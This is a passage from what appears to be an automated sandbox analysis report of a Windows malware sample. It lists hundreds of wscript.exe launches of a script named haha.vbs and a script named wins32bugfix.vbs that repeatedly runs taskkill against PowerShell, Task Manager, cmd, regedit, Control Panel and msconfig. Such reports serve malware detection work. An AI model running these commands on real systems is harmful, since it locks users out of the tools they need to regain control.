        723⤵
        
        PID:11736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        724⤵
        
        PID:11972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        725⤵
        
        PID:12196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        726⤵
        
        PID:24516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        727⤵
        
        PID:12176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        728⤵
        
        PID:12460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        729⤵
        
        PID:29720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        730⤵
        
        PID:29760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        731⤵
        
        PID:29816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        732⤵
        
        PID:29856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        733⤵
        
        PID:29904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        734⤵
        
        PID:29952
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        735⤵
        
        PID:30004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        736⤵
        
        PID:30056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        737⤵
        
        PID:30108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        738⤵
        
        PID:30160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        739⤵
        
        PID:30212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        740⤵
        
        PID:30256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        741⤵
        
        PID:30304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        742⤵
        
        PID:30352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        743⤵
        
        PID:30396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        744⤵
        
        PID:30440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        745⤵
        
        PID:30488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        746⤵
        
        PID:30548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        747⤵
        
        PID:30604
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        748⤵
        
        PID:30648
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        749⤵
        
        PID:30708
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        750⤵
        
        PID:29848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        751⤵
        
        PID:12908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        752⤵
        
        PID:13064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        753⤵
        
        PID:13300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        754⤵
        
        PID:25100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        755⤵
        
        PID:13584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        756⤵
        
        PID:13852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        757⤵
        
        PID:13976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        758⤵
        
        PID:30044
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        759⤵
        
        PID:5256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        760⤵
        
        PID:30248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        761⤵
        
        PID:25640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        762⤵
        
        PID:3320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        763⤵
        
        PID:14652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        764⤵
        
        PID:25748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        765⤵
        
        PID:14900
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        766⤵
        
        PID:30724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        767⤵
        
        PID:30784
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        768⤵
        
        PID:30836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        769⤵
        
        PID:30900
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        770⤵
        
        PID:30972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        771⤵
        
        PID:31028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        772⤵
        
        PID:31072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        773⤵
        
        PID:31128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        774⤵
        
        PID:31164
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        775⤵
        
        PID:31208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        776⤵
        
        PID:31244
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        777⤵
        
        PID:31304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        778⤵
        
        PID:31344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        779⤵
        
        PID:31392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        780⤵
        
        PID:31460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        781⤵
        
        PID:31532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        782⤵
        
        PID:31580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        783⤵
        
        PID:31620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        784⤵
        
        PID:31664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        785⤵
        
        PID:31712
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        786⤵
        
        PID:5800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        787⤵
        
        PID:15160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        788⤵
        
        PID:15176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        789⤵
        
        PID:15348
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        790⤵
        
        PID:31000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        791⤵
        
        PID:26140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        792⤵
        
        PID:31116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        793⤵
        
        PID:31200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        794⤵
        
        PID:15560
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        795⤵
        
        PID:15668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        796⤵
        
        PID:15780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        797⤵
        
        PID:1548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        798⤵
        
        PID:26888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        799⤵
        
        PID:27300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        800⤵
        
        PID:31740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        801⤵
        
        PID:15312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        802⤵
        
        PID:14584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        803⤵
        
        PID:18792
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        804⤵
        
        PID:26660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        805⤵
        
        PID:16844
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        806⤵
        
        PID:16084
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        807⤵
        
        PID:17176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        808⤵
        
        PID:17372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        809⤵
        
        PID:27912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        810⤵
        
        PID:31748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        811⤵
        
        PID:31816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        812⤵
        
        PID:31892
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        813⤵
        
        PID:31956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        814⤵
        
        PID:32020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        815⤵
        
        PID:32080
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        816⤵
        
        PID:32132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        817⤵
        
        PID:32200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        818⤵
        
        PID:32256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        819⤵
        
        PID:32316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        820⤵
        
        PID:32392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        821⤵
        
        PID:32440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        822⤵
        
        PID:32516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        823⤵
        
        PID:32596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        824⤵
        
        PID:32660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        825⤵
        
        PID:32716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        826⤵
        
        PID:17740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        827⤵
        
        PID:28092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        828⤵
        
        PID:31824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        829⤵
        
        PID:28320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        830⤵
        
        PID:32012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        831⤵
        
        PID:32168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        832⤵
        
        PID:3812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        833⤵
        
        PID:4572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        834⤵
        
        PID:32388
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        835⤵
        
        PID:17556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        836⤵
        
        PID:32468
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        837⤵
        
        PID:18476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        838⤵
        
        PID:32656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        839⤵
        
        PID:32752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        840⤵
        
        PID:2708
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        841⤵
        
        PID:6224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        842⤵
        
        PID:6660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        843⤵
        
        PID:19048
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        844⤵
        
        PID:19156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        845⤵
        
        PID:19236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        846⤵
        
        PID:19368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        847⤵
        
        PID:19440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        848⤵
        
        PID:7508
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        849⤵
        
        PID:7656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        850⤵
        
        PID:7388
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        851⤵
        
        PID:6228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        852⤵
        
        PID:18452
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        853⤵
        
        PID:8068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        854⤵
        
        PID:29240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        855⤵
        
        PID:29344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        856⤵
        
        PID:8360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        857⤵
        
        PID:20060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        858⤵
        
        PID:20132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        859⤵
        
        PID:20224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        860⤵
        
        PID:20300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        861⤵
        
        PID:9104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        862⤵
        
        PID:4624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        863⤵
        
        PID:7504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        864⤵
        
        PID:9180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        865⤵
        
        PID:9580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        866⤵
        
        PID:8000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        867⤵
        
        PID:20724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        868⤵
        
        PID:20928
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        869⤵
        
        PID:21100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        870⤵
        
        PID:21200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        871⤵
        
        PID:21284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        872⤵
        
        PID:9848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        873⤵
        
        PID:21252
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\wins32bugfix.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2960
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3912
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1940
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4932
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5280
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1960
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:7148
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:10804
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:11016
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:11244
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:10804
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:11244
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:11368
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:11600
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5568
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:14544
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:14668
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:14816
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:15088
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      PID:15272
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      PID:14616
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:17536
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:17688
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:17840
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:18024
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:18160
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:18328
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:17604
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:20596
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:20836
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:21048
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:21268
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      PID:9008
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      PID:10084
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      PID:10292
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:23864
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:24000
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:24156
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:24384
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      PID:13792
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:13832
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      PID:24416
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:17320
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:26804
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:27292
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:26872
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:17716
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:27036
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:18708
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:28804
  - - C:\Windows\System32\taskkill.exe
